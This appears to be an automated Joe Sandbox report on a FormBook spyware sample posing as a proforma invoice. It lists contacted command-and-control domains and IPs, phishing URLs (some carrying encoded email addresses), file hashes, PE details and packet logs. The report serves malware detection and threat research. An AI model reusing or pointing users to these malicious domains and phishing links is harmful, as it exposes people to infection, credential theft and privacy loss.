                                                        http://www.neg21.top/w6i7/false
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabEhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://roopiedutech.online/7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMdEhStorAuthn.exe, 00000006.00000002.4499739121.000000000593E000.00000004.10000000.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498957890.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.nutrigenfit.onlinekYuxUXtJmKaZ.exe, 00000008.00000002.4500691276.0000000005491000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ac.ecosia.org/autocomplete?q=EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchEhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://seikai.click/c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6EhStorAuthn.exe, 00000006.00000002.4499739121.0000000005AD0000.00000004.10000000.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498957890.0000000003D10000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.seraph.best/EhStorAuthn.exe, 00000006.00000002.4499739121.00000000052F6000.00000004.10000000.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498957890.0000000003536000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        52.20.84.62
                                                                        		www.seraph.bestUnited States
                                                                        		14618AMAZON-AESUSfalse
                                                                        67.223.117.142
                                                                        		www.jorbaq.topUnited States
                                                                        		15189VIMRO-AS15189USfalse
                                                                        195.110.124.133
                                                                        		nutrigenfit.onlineItaly
                                                                        		39729REGISTER-ASITfalse
                                                                        103.191.208.137
                                                                        		roopiedutech.onlineunknown
                                                                        		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                        84.32.84.32
                                                                        		suerteconysa.onlineLithuania
                                                                        		33922NTT-LT-ASLTfalse
                                                                        206.119.81.36
                                                                        		neg21.topUnited States
                                                                        		174COGENT-174USfalse
                                                                        172.96.191.232
                                                                        		thefokusdong43.clickCanada
                                                                        		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGfalse
                                                                        3.33.130.190
                                                                        		trifecta.centerUnited States
                                                                        		8987AMAZONEXPANSIONGBfalse
                                                                        183.90.181.102
                                                                        		www.seikai.clickJapan37907DIGIROCKDigiRockIncJPfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1550873
                                                                        Start date and time:2024-11-07 10:08:04 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 11m 46s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:proforma Invoice.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@12/9
                                                                        EGA Information:
                                                                        • Successful, ratio: 75%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 96
                                                                        • Number of non-executed functions: 277
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: proforma Invoice.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        04:08:54API Interceptor2x Sleep call for process: proforma Invoice.exe modified
                                                                        04:10:15API Interceptor8964426x Sleep call for process: EhStorAuthn.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        52.20.84.62SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                        • www.seraph.best/dse0/
                                                                        wODub61gZe.exeGet hashmaliciousFormBookBrowse
                                                                        • www.luxe.guru/zdib/
                                                                        Order SO311180.exeGet hashmaliciousFormBookBrowse
                                                                        • www.seraph.best/qfwu/
                                                                        Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.luxe.guru/esft/
                                                                        http://fortcollinsfineart.com/Get hashmaliciousUnknownBrowse
                                                                        • fortcollinsfineart.com/
                                                                        T9W7MCS2HI.exeGet hashmaliciousFormBookBrowse
                                                                        • www.luxe.guru/s9un/
                                                                        UPDATED Q-LOT24038.exeGet hashmaliciousFormBookBrowse
                                                                        • www.luxe.guru/s9un/
                                                                        PO S-TECHAccolle654657659768774876980.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.rezzla.com/n5i5/
                                                                        gRDcPJpgMQ.exeGet hashmaliciousFormBookBrowse
                                                                        • www.comicdesk.xyz/fs83/?F0G=4hOdKx&AZ=uIYpFveLu/CBw7DmAO/Ti/dUlBfSx1al2FMqfKekdnKV/Pg8KM0G546XOuFlZTdYS3bk
                                                                        UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                                                        • www.comicdesk.xyz/fs83/?K6kd=uIYpFveLu/CBw7DmAO/Ti/dUlBfSx1al2FMqfKekdnKV/Pg8KM0G546XOuJlKDRbLnbyZHKrPA==&uTrL=_bj8lfEpU
                                                                        67.223.117.142DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                        • www.plyvik.info/ak8m/
                                                                        SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                        • www.plyvik.info/yhso/
                                                                        INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                        • www.plyvik.info/ak8m/
                                                                        195.110.124.133DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nutrigenfit.online/uye5/
                                                                        INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nutrigenfit.online/2vhi/
                                                                        56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nidedabeille.net/oy0l/
                                                                        p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nidedabeille.net/oy0l/?uXP=1HX8&Q2_4=vcWw5DdjdQnkJmRMu9Bv0nYhxIjg8XNP87kLKcEwcjL/VJXYlRnLhwXYdIbeiM5Wp1LHJGQmwLmzd8N63pnOImbiL9MWYGLhlQi4+Y3hzWOb/gf9Ze4XcY0=
                                                                        IMPORT PERMITS.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nutrigenfit.online/uhg3/
                                                                        draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nutrigenfit.online/uhg3/
                                                                        HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nutrigenfit.online/2vhi/
                                                                        Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.nidedabeille.net/qkk1/
                                                                        INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nutrigenfit.online/uye5/
                                                                        rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nutrigenfit.online/938r/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.seraph.bestSecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                        • 52.20.84.62
                                                                        Order SO311180.exeGet hashmaliciousFormBookBrowse
                                                                        • 52.20.84.62

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        AMAZON-AESUSCamilla.Chua_Review_Salary147d1c0f-8d0d-4d8d-9d2d-d7e26c541d67_Vliio.pdfGet hashmaliciousUnknownBrowse
                                                                        • 52.5.13.197
                                                                        https://www.google.co.uk/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=cvwiFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/Byr48#ZXMucGFya0BoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                        • 34.237.25.55
                                                                        https://eu2.contabostorage.com/0f057bf4d91340d3ae18d5f31372fa7e:caldev/doc.html#dloplcemeteryoversight-labor@maryland.govGet hashmaliciousHTMLPhisherBrowse
                                                                        • 3.217.91.211
                                                                        sDX1AXN1Zp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 54.221.121.185
                                                                        C6IlHsFs4g.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 54.128.146.122
                                                                        https://www.wallpaperflare.com/Get hashmaliciousUnknownBrowse
                                                                        • 52.72.0.42
                                                                        https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=%5B%5Brandom_string%28%29%5D%5DFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/7z0i5#d2poYW5AaGRlbC5jby5rcg==Get hashmaliciousHTMLPhisherBrowse
                                                                        • 54.167.19.172
                                                                        tjackson Payout File.pdfGet hashmaliciousUnknownBrowse
                                                                        • 23.22.254.206
                                                                        https://2fa.com-token-auth.com/XR2d6OStocUxmeEZiSWdTa3V1VWlmNGQzYVc5WDIyZW5ONnlqQ1o5aTlqSERVa0lwcEprZ0JFREwrYjlCcVNXcEt2N3RiV05UcGJ5QjR3Z3lHQW9XQW4vR1JBa2ptVldqcWE0TStUbUlpMk9PZGhXSVhCc3V1NHBYc1RJKzdPZHpPcEowaEkzdTl3Y0EyWnY1b2xFakwvYmllbDM0MFRFNW9KSkRaR1RlRkcyTkxZMjgyaWNENllBVy0tcUpWT3lXY2g4dGlZRlpGZS0tcXFCU3hvYkNSaVBIeHZscFh1VDdLdz09?cid=2268825838Get hashmaliciousKnowBe4Browse
                                                                        • 23.20.195.80
                                                                        Updated Document-9875488675.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                        • 23.22.254.206
                                                                        REGISTER-ASITDHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                        • 195.110.124.133
                                                                        INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                        • 195.110.124.133
                                                                        56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                        • 195.110.124.133
                                                                        p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                        • 195.110.124.133
                                                                        IMPORT PERMITS.exeGet hashmaliciousFormBookBrowse
                                                                        • 195.110.124.133
                                                                        draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                        • 195.110.124.133
                                                                        HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                        • 195.110.124.133
                                                                        WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 81.88.48.71
                                                                        Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 195.110.124.133
                                                                        INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                        • 195.110.124.133
                                                                        VIMRO-AS15189USDHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.142
                                                                        icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.118.17
                                                                        SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.142
                                                                        INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.142
                                                                        QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.169
                                                                        foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.189
                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.169
                                                                        w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.189
                                                                        enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.189
                                                                        yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 208.85.174.50
                                                                        AARNET-AS-APAustralianAcademicandResearchNetworkAARNerPO.exeGet hashmaliciousRemcosBrowse
                                                                        • 103.186.117.77
                                                                        9JvpARJbsQ.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.166.51.133
                                                                        yakuza.x86.elfGet hashmaliciousUnknownBrowse
                                                                        • 138.45.164.106
                                                                        h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                        • 134.150.22.169
                                                                        POP (2).pdfGet hashmaliciousUnknownBrowse
                                                                        • 103.168.172.56
                                                                        mips.elfGet hashmaliciousMirai, GafgytBrowse
                                                                        • 130.56.234.64
                                                                        sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                        • 134.149.156.188
                                                                        DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.191.208.137
                                                                        mips.elfGet hashmaliciousMiraiBrowse
                                                                        • 103.178.168.94
                                                                        https://t.co/WUjzOGRMNxGet hashmaliciousUnknownBrowse
                                                                        • 103.67.200.72

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\proforma Invoice.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\proforma Invoice.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                        C:\Users\user\AppData\Local\Temp\s002-5p

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\EhStorAuthn.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.603276868340257
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:proforma Invoice.exe
                                                                        File size:972'288 bytes
                                                                        MD5:3757282ce10c90df6d5e364e22975534
                                                                        SHA1:7b1b6eca6f742cfc044a83c433a506302b1d277e
                                                                        SHA256:519e372bb8026c5aea93a6d44aefb4b08eb23731f2f902ae35866c5d6cc3dd97
                                                                        SHA512:51ce74f7e6a9e8e151bda63a240df98d207d686967d6cd8f2d780d4fe2f24f73b053547c3a50aeb6722446f0765674adff4a7260cca91a5374d238a0c0b47c15
                                                                        SSDEEP:24576:IW2t5ssmGMoigAGFDNMXTss0oll2pHX2u/:IW23UGMoZACmDsTollMG
                                                                        TLSH:3225BED03A21AB19DE6D8BB8C159DD7483B01D657006FBAE5DD83BD738B9320A908F47
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@+g..............0......P........... ........@.. .......................@............@................................

                                                                        File Icon

                                                                        Icon Hash:1365d6b2924c718f

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4ea3b6
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x672B40DD [Wed Nov 6 10:11:41 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        adc al, 00h
                                                                        add byte ptr [eax], al
                                                                        adc dword ptr [eax], eax
                                                                        add byte ptr [eax], al
                                                                        adc dword ptr [eax], eax
                                                                        add byte ptr [eax], al
                                                                        adc byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        sldt word ptr [eax]
                                                                        add byte ptr [esi], cl
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [esi], cl
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+eax], cl
                                                                        add byte ptr [eax], al
                                                                        or al, 00h
                                                                        add byte ptr [eax], al
                                                                        or al, 00h
                                                                        add byte ptr [eax], al
                                                                        or al, byte ptr [eax]
                                                                        add byte ptr [eax], al
                                                                        or eax, 0C000000h
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [ebx], cl
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [edi], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xea3640x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xec0000x4ce4.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf20000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xe83fc0xe8400a91509f2a7e62a836bb1a06689808b72False0.8058490732642627OpenPGP Public Key7.599057364537114IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xec0000x4ce40x4e00d80676686d01e9e8494710f3e9978936False0.9481670673076923data7.832001351047935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xf20000xc0x2007dd7a0d435d5dff554e2c75b0c714fd7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xec0c80x48cdPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.991039330364329
                                                                        RT_GROUP_ICON0xf09a80x14data1.05
                                                                        RT_VERSION0xf09cc0x314data0.4149746192893401

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-07T10:09:14.534827+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549709TCP
                                                                        2024-11-07T10:09:53.290899+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549922TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 7, 2024 10:09:51.634749889 CET4992080192.168.2.53.33.130.190
                                                                        Nov 7, 2024 10:09:51.639621019 CET80499203.33.130.190192.168.2.5
                                                                        Nov 7, 2024 10:09:51.639713049 CET4992080192.168.2.53.33.130.190
                                                                        Nov 7, 2024 10:09:51.650985956 CET4992080192.168.2.53.33.130.190
                                                                        Nov 7, 2024 10:09:51.655847073 CET80499203.33.130.190192.168.2.5
                                                                        Nov 7, 2024 10:09:53.221529961 CET80499203.33.130.190192.168.2.5
                                                                        Nov 7, 2024 10:09:53.222362041 CET80499203.33.130.190192.168.2.5
                                                                        Nov 7, 2024 10:09:53.222510099 CET4992080192.168.2.53.33.130.190
                                                                        Nov 7, 2024 10:09:53.225744009 CET4992080192.168.2.53.33.130.190
                                                                        Nov 7, 2024 10:09:53.230705976 CET80499203.33.130.190192.168.2.5
                                                                        Nov 7, 2024 10:10:08.485091925 CET4998180192.168.2.552.20.84.62
                                                                        Nov 7, 2024 10:10:08.492158890 CET804998152.20.84.62192.168.2.5
                                                                        Nov 7, 2024 10:10:08.492284060 CET4998180192.168.2.552.20.84.62
